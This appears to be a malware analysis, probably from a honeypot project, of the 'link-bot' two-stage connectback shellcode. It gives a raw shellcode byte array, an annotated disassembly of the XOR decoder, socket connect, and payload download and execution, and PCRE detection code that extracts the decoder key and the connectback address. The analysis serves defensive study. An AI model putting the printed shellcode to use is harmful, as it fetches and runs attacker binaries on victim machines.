unsigned char unknown_req3[] = { 0x83 ,0xec ,0x20 ,0x8b ,0xec ,0x89 ,0x5d ,0x04 ,0x89 ,0x7d ,0x00 ,0x81 ,0xec ,0x00 ,0x02 ,0x00 ,0x00 ,0x89 ,0x65 ,0x14 ,0x33 ,0xdb ,0x64 ,0x8b ,0x43 ,0x30 ,0x8b ,0x40 ,0x0c ,0x8b ,0x70 ,0x1c ,0xad ,0x8b ,0x78 ,0x08 ,0x89 ,0x7d ,0x08 ,0xe8 ,0x45 ,0x00 ,0x00 ,0x00 ,0x53 ,0x56 ,0x8b ,0x5f ,0x3c ,0x8b ,0x5c ,0x3b ,0x78 ,0x03 ,0xdf ,0x53 ,0x8b ,0x5b ,0x20 ,0x03 ,0xdf ,0x53 ,0x83 ,0xc3 ,0x04 ,0x8b ,0x33 ,0x03 ,0xf7 ,0x33 ,0xc9 ,0xac ,0x32 ,0xc8 ,0xc1 ,0xc1 ,0x05 ,0x84 ,0xc0 ,0x75 ,0xf6 ,0x2b ,0xca ,0x75 ,0xe9 ,0x58 ,0x2b ,0xd8 ,0xd1 ,0xeb ,0x5e ,0x03 ,0x5e ,0x24 ,0x03 ,0xdf ,0x66 ,0x8b ,0x0b ,0x8b ,0x5e ,0x1c ,0x03 ,0xdf ,0x8b ,0x04 ,0x8b ,0x03 ,0xc7 ,0x5e ,0x5b ,0xff ,0xe0 ,0x5e ,0x68 ,0x33 ,0x32 ,0x00 ,0x00 ,0x68 ,0x77 ,0x73 ,0x32 ,0x5f ,0x54 ,0xba ,0x92 ,0x6e ,0x04 ,0x84 ,0xff ,0xd6 ,0x89 ,0x45 ,0x0c ,0x8b ,0xf8 ,0x53 ,0x6a ,0x04 ,0x55 ,0xff ,0x75 ,0x04 ,0xba ,0x00 ,0x90 ,0x66 ,0xe0 ,0xff ,0xd6 ,0x83 ,0xf8 ,0x04 ,0x0f ,0x85 ,0xc5 ,0x00 ,0x00 ,0x00 ,0x8b ,0x7d ,0x08 ,0xe8 ,0x0d ,0x00 ,0x00 ,0x00 ,0x69 ,0x70 ,0x6c ,0x66 ,0x2e ,0x65 ,0x78 ,0x65 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x8f ,0x45 ,0x18 ,0x53 ,0x6a ,0x02 ,0x6a ,0x01 ,0x53 ,0x53 ,0x68 ,0x00 ,0x00 ,0x00 ,0xc0 ,0xff ,0x75 ,0x18 ,0xba ,0x3d ,0xd3 ,0x6b ,0x5c ,0xff ,0xd6 ,0x89 ,0x45 ,0x1c ,0x40 ,0x0f ,0x84 ,0x8d ,0x00 ,0x00 ,0x00 ,0x8b ,0x7d ,0x0c ,0x33 ,0xc0 ,0x50 ,0xb4 ,0x02 ,0x50 ,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x04 ,0xba ,0x00 ,0x58 ,0x60 ,0xe2 ,0xff ,0xd6 ,0x8b ,0x7d ,0x08 ,0x85 ,0xc0 ,0x74 ,0x1e ,0x8b ,0xc8 ,0x41 ,0x74 ,0x57 ,0x53 ,0x8d ,0x4d ,0x10 ,0x51 ,0x50 ,0xff ,0x75 ,0x14 ,0xff ,0x75 ,0x1c ,0xba ,0xb9 ,0xbe ,0xf5 ,0xcb ,0xff ,0xd6 ,0x85 ,0xc0 ,0x74 ,0x40 ,0xeb ,0xc5 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0x6a ,0x44 ,0x58 ,0x2b ,0xe0 ,0x8b ,0xfc ,0x8b ,0xd7 ,0xab ,0x33 ,0xc0 ,0x6a ,0x10 ,0x59 ,0xab ,0xe2 ,0xfd ,0x8b ,0x7d ,0x08 ,0x52 ,0x52 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0x50 ,0xff ,0x75 ,0x18 ,0xba ,0x2c ,0xf1 ,0x94 ,0x26 ,0xff ,0xd6 ,0x58 ,0xfe ,0xc7 ,0x53 ,0x50 ,0xba ,0x01 ,0xd6 ,0x34 ,0xde ,0xff ,0xd6 ,0xff ,0x75 ,0x1c ,0xba ,0x5c ,0x93 ,0xc5 ,0x9d ,0xff ,0xd6 ,0xff ,0x75 ,0x18 ,0xba ,0x3d ,0x53 ,0xcf ,0x27 ,0xff ,0xd6 ,0x8b ,0x7d ,0x0c ,0xff ,0x75 ,0x04 ,0xba ,0x85 ,0x56 ,0x31 ,0x07 ,0xff ,0xd6 ,0x8b ,0x7d ,0x08 ,0xba ,0xba ,0x46 ,0x0c ,0xc1 ,0xff ,0xd6 };
In short: After dexor’ing Stage 1 contains an authentication key (4 bytes) and opens a connectback connection. The attacker will then send stage 2 over this connection (380 bytes more code). Stage 2 replies the authentication key from stage 1, if this key is verified as valid, the attacker will stream the binary.
00402018 eb 15 jmp short link-03.0040202f 0040201a b9 8be61341 mov ecx,4113e68b 0040201f 81f1 39e61341 xor ecx,4113e639 00402025 5e pop esi 00402026 807431 ff 17 xor byte ptr ds:[ecx+esi-1],17 0040202b ^e2 f9 loopd short link-03.00402026 0040202d eb 05 jmp short link-03.00402034 0040202f e8 e6ffffff call link-03.0040201a 00402034 33db xor ebx,ebx 00402036 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 0040203a 8b40 0c mov eax,dword ptr ds:[eax+c] 0040203d 8b70 1c mov esi,dword ptr ds:[eax+1c] 00402040 ad lods dword ptr ds:[esi] 00402041 8b78 08 mov edi,dword ptr ds:[eax+8] 00402044 e8 45000000 call link-03.0040208e 00402049 53 push ebx ; ------ syscall finder 0040204a 56 push esi 0040204b 8b5f 3c mov ebx,dword ptr ds:[edi+3c] 0040204e 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] 00402052 03df add ebx,edi 00402054 53 push ebx 00402055 8b5b 20 mov ebx,dword ptr ds:[ebx+20] 00402058 03df add ebx,edi 0040205a 53 push ebx 0040205b 83c3 04 add ebx,4 0040205e 8b33 mov esi,dword ptr ds:[ebx] 00402060 03f7 add esi,edi 00402062 33c9 xor ecx,ecx 00402064 ac lods byte ptr ds:[esi] 00402065 32c8 xor cl,al 00402067 c1c1 05 rol ecx,5 0040206a 84c0 test al,al 0040206c ^75 f6 jnz short link-03.00402064 0040206e 2bca sub ecx,edx 00402070 ^75 e9 jnz short link-03.0040205b 00402072 58 pop eax 00402073 2bd8 sub ebx,eax 00402075 d1eb shr ebx,1 00402077 5e pop esi 00402078 035e 24 add ebx,dword ptr ds:[esi+24] 0040207b 03df add ebx,edi 0040207d 66:8b0b mov cx,word ptr ds:[ebx] 00402080 8b5e 1c mov ebx,dword ptr ds:[esi+1c] 00402083 03df add ebx,edi 00402085 8b048b mov eax,dword ptr ds:[ebx+ecx*4] 00402088 03c7 add eax,edi 0040208a 5e pop esi 0040208b 5b pop ebx 0040208c ffe0 jmp eax 0040208e 5e pop esi ; ------- end 0040208f 68 33320000 push 3233 00402094 68 7773325f push 5f327377 00402099 54 push esp 0040209a ba 926e0484 mov edx,84046e92 0040209f ffd6 call esi ; loadlibrarya() 004020a1 8bf8 mov edi,eax 004020a3 81ec 00020000 sub esp,200 004020a9 8bec mov ebp,esp 004020ab 53 push ebx 004020ac 6a 01 push 1 004020ae 6a 02 push 2 004020b0 ba 83538300 mov edx,835383 004020b5 ffd6 call esi ; socket() 004020b7 53 push ebx 004020b8 53 push ebx 004020b9 68 3e2fd9fe push fed92f3e 004020be 68 02003c19 push 193c0002 004020c3 8bd4 mov edx,esp 004020c5 8bd8 mov ebx,eax 004020c7 6a 10 push 10 004020c9 52 push edx 004020ca 53 push ebx 004020cb ba 6330605a mov edx,5a603063 004020d0 ffd6 call esi ; connect() 004020d2 50 push eax 004020d3 b4 02 mov ah,2 004020d5 50 push eax 004020d6 55 push ebp 004020d7 53 push ebx 004020d8 ba 005860e2 mov edx,e2605800 004020dd ffd6 call esi ; recv() 004020df bf acac0685 mov edi,8506acac ; ! this is the auth key 004020e4 ffe5 jmp ebp ; jump to stage 2
0040229a 83ec 20 sub esp,20 0040229d 8bec mov ebp,esp 0040229f 895d 04 mov dword ptr ss:[ebp+4],ebx 004022a2 897d 00 mov dword ptr ss:[ebp],edi ; save auth key in [ebp] 004022a5 81ec 00020000 sub esp,200 004022ab 8965 14 mov dword ptr ss:[ebp+14],esp 004022ae 33db xor ebx,ebx 004022b0 64:8b43 30 mov eax,dword ptr fs:[ebx+30] 004022b4 8b40 0c mov eax,dword ptr ds:[eax+c] 004022b7 8b70 1c mov esi,dword ptr ds:[eax+1c] 004022ba ad lods dword ptr ds:[esi] 004022bb 8b78 08 mov edi,dword ptr ds:[eax+8] 004022be 897d 08 mov dword ptr ss:[ebp+8],edi 004022c1 e8 45000000 call link-03.0040230b 004022c6 53 push ebx ; ----- syscall lookup fn 004022c7 56 push esi 004022c8 8b5f 3c mov ebx,dword ptr ds:[edi+3c] 004022cb 8b5c3b 78 mov ebx,dword ptr ds:[ebx+edi+78] 004022cf 03df add ebx,edi 004022d1 53 push ebx 004022d2 8b5b 20 mov ebx,dword ptr ds:[ebx+20] 004022d5 03df add ebx,edi 004022d7 53 push ebx 004022d8 83c3 04 add ebx,4 004022db 8b33 mov esi,dword ptr ds:[ebx] 004022dd 03f7 add esi,edi 004022df 33c9 xor ecx,ecx 004022e1 ac lods byte ptr ds:[esi] 004022e2 32c8 xor cl,al 004022e4 c1c1 05 rol ecx,5 004022e7 84c0 test al,al 004022e9 ^75 f6 jnz short link-03.004022e1 004022eb 2bca sub ecx,edx 004022ed ^75 e9 jnz short link-03.004022d8 004022ef 58 pop eax 004022f0 2bd8 sub ebx,eax 004022f2 d1eb shr ebx,1 004022f4 5e pop esi 004022f5 035e 24 add ebx,dword ptr ds:[esi+24] 004022f8 03df add ebx,edi 004022fa 66:8b0b mov cx,word ptr ds:[ebx] 004022fd 8b5e 1c mov ebx,dword ptr ds:[esi+1c] 00402300 03df add ebx,edi 00402302 8b048b mov eax,dword ptr ds:[ebx+ecx*4] 00402305 03c7 add eax,edi 00402307 5e pop esi 00402308 5b pop ebx 00402309 ffe0 jmp eax ; ------ 0040230b 5e pop esi 0040230c 68 33320000 push 3233 00402311 68 7773325f push 5f327377 00402316 54 push esp 00402317 ba 926e0484 mov edx,84046e92 0040231c ffd6 call esi ; loadlibrarya() 0040231e 8945 0c mov dword ptr ss:[ebp+c],eax 00402321 8bf8 mov edi,eax 00402323 53 push ebx ; int flags 00402324 6a 04 push 4 ; int len 00402326 55 push ebp ; const void *buf (auth key from stage 1) 00402327 ff75 04 push dword ptr ss:[ebp+4] ; int s 0040232a ba 009066e0 mov edx,e0669000 0040232f ffd6 call esi ; send() 00402331 83f8 04 cmp eax,4 00402334 0f85 c5000000 jnz link-03.004023ff 0040233a 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040233d e8 0d000000 call link-03.0040234f 00402342 6377 64 arpl word ptr ds:[edi+64],si 00402345 6f outs dx,dword ptr es:[edi] ; i/o command 00402346 7a 2e jpe short link-03.00402376 00402348 65:78 65 js short link-03.004023b0 ; superfluous prefix 0040234b 0000 add byte ptr ds:[eax],al 0040234d 0000 add byte ptr ds:[eax],al 0040234f 8f45 18 pop dword ptr ss:[ebp+18] ; ---- reply sent 00402352 53 push ebx 00402353 6a 02 push 2 00402355 6a 01 push 1 00402357 53 push ebx 00402358 53 push ebx 00402359 68 000000c0 push c0000000 0040235e ff75 18 push dword ptr ss:[ebp+18] 00402361 ba 3dd36b5c mov edx,5c6bd33d 00402366 ffd6 call esi ; createfilea 00402368 8945 1c mov dword ptr ss:[ebp+1c],eax 0040236b 40 inc eax 0040236c 0f84 8d000000 je link-03.004023ff ; errorhandling 00402372 8b7d 0c mov edi,dword ptr ss:[ebp+c] 00402375 33c0 xor eax,eax 00402377 50 push eax 00402378 b4 02 mov ah,2 0040237a 50 push eax 0040237b ff75 14 push dword ptr ss:[ebp+14] 0040237e ff75 04 push dword ptr ss:[ebp+4] 00402381 ba 005860e2 mov edx,e2605800 00402386 ffd6 call esi ; recv() 00402388 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040238b 85c0 test eax,eax 0040238d 74 1e je short link-03.004023ad ; u! 0040238f 8bc8 mov ecx,eax 00402391 41 inc ecx 00402392 74 57 je short link-03.004023eb ; errorhandling 00402394 53 push ebx 00402395 8d4d 10 lea ecx,dword ptr ss:[ebp+10] 00402398 51 push ecx 00402399 50 push eax 0040239a ff75 14 push dword ptr ss:[ebp+14] 0040239d ff75 1c push dword ptr ss:[ebp+1c] 004023a0 ba b9bef5cb mov edx,cbf5beb9 004023a5 ffd6 call esi 004023a7 85c0 test eax,eax 004023a9 74 40 je short link-03.004023eb 004023ab ^eb c5 jmp short link-03.00402372 004023ad ff75 1c push dword ptr ss:[ebp+1c] 004023b0 ba 5c93c59d mov edx,9dc5935c 004023b5 ffd6 call esi 004023b7 6a 44 push 44 004023b9 58 pop eax 004023ba 2be0 sub esp,eax 004023bc 8bfc mov edi,esp 004023be 8bd7 mov edx,edi 004023c0 ab stos dword ptr es:[edi] 004023c1 33c0 xor eax,eax 004023c3 6a 10 push 10 004023c5 59 pop ecx 004023c6 ab stos dword ptr es:[edi] 004023c7 ^e2 fd loopd short link-03.004023c6 004023c9 8b7d 08 mov edi,dword ptr ss:[ebp+8] 004023cc 52 push edx 004023cd 52 push edx 004023ce 50 push eax 004023cf 50 push eax 004023d0 50 push eax 004023d1 50 push eax 004023d2 50 push eax 004023d3 50 push eax 004023d4 50 push eax 004023d5 ff75 18 push dword ptr ss:[ebp+18] 004023d8 ba 2cf19426 mov edx,2694f12c 004023dd ffd6 call esi 004023df 58 pop eax 004023e0 fec7 inc bh 004023e2 53 push ebx 004023e3 50 push eax 004023e4 ba 01d634de mov edx,de34d601 004023e9 ffd6 call esi 004023eb ff75 1c push dword ptr ss:[ebp+1c] 004023ee ba 5c93c59d mov edx,9dc5935c 004023f3 ffd6 call esi ; closehandle() 004023f5 ff75 18 push dword ptr ss:[ebp+18] 004023f8 ba 3d53cf27 mov edx,27cf533d 004023fd ffd6 call esi ; deletefilea() 004023ff 8b7d 0c mov edi,dword ptr ss:[ebp+c] ; --- error handling 00402402 ff75 04 push dword ptr ss:[ebp+4] 00402405 ba 85563107 mov edx,7315685 0040240a ffd6 call esi ; closesocket() 0040240c 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040240f ba ba460cc1 mov edx,c10c46ba 00402414 ffd6 call esi ; exitthread()
const char *xorpcre = "^.*\\xEB\\x15\\xB9\\x8B\\xE6\\x13\\x41\\x81\\xF1\\x39\\xE6\\x13\\x41\\x5E\\x80\\x74\\x31\\xFF(.)\\xE2\\xF9\\xEB\\x05\\xE8\\xE6\\xFF\\xFF\\xFF(.*)$"; pcre_get_substring((char *)shellcode, offvec, result, 1, &key); payloadLen = offvec[5] - offvec[4]; payload = (unsigned char *) malloc(payloadLen); memcpy(payload, shellcode + offvec[4], payloadLen); for( uint i = 0; i < 0xb1 && i < payloadLen; i++ ) payload[i] ^= *key; logDebug("Detected link-bot XOR decoder, key is 0x%x, payload is 0x%x bytes long.\n", * ((unsigned char *) key), payloadLen); pcre_free_substring(key);
the code to find the ip & port to connectback to ( sch_dcom_linktrans )
const char *pcre = ".*(\\x33\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x78\\x08.*\\x59\\x1c).*"; if ((iResult = pcre_exec(m_pcre, 0, (char *) shellcode, len, 0, 0, piOutput, sizeof(piOutput))) > 0) { const char * pCode; int usPort; unsigned long ulHost; unsigned int foo = pcre_get_substring((char *) shellcode, piOutput, iResult, 1, &pCode); // (*msg)->getSocket()->getNepenthes()->getUtilities()->hexdump((unsigned char *)pCode,foo); ulHost = *((unsigned long *) &pCode[134]); memcpy(&usPort,shellcode+141,4); logInfo("Link Connectback Transferr on %s:%i %i (%i <-> %i)\n",inet_ntoa(*(in_addr *)&ulHost),usPort, ntohs(usPort), foo,(*msg)->getMsgLen());
